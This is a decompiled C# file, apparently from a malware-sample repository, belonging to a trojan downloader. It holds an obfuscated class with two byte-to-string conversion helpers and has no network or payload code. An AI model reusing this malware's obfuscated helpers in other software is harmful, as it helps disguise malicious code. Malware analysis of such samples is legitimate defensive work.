MalwareSourceCode/MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/panz0mon2f5aateyhtphwozah.cs

34 lines
1.2 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: panz0mon2f5aateyhtphwozah
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using System;
using System.Text;
public static class panz0mon2f5aateyhtphwozah
{
public static string Dsknrcn3xgwm4kutqcymeqtg4(byte[] Re2ucj3x4frepzs3c)
{
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < Re2ucj3x4frepzs3c.Length; ++index)
{
char ch = Convert.ToChar(Re2ucj3x4frepzs3c[index]);
stringBuilder.Append(Convert.ToString(ch));
}
return stringBuilder.ToString();
}
public static byte[] ydxqx4ckpkuemhnp4n2eb4laj(string Kos13k2jgfqobt5uhqj5cspab)
{
byte[] numArray = new byte[Kos13k2jgfqobt5uhqj5cspab.Length];
for (int startIndex = 0; startIndex < Kos13k2jgfqobt5uhqj5cspab.Length; ++startIndex)
{
char ch = Convert.ToChar(Kos13k2jgfqobt5uhqj5cspab.Substring(startIndex, 1));
numArray[startIndex] = Convert.ToByte(ch);
}
return numArray;
}
}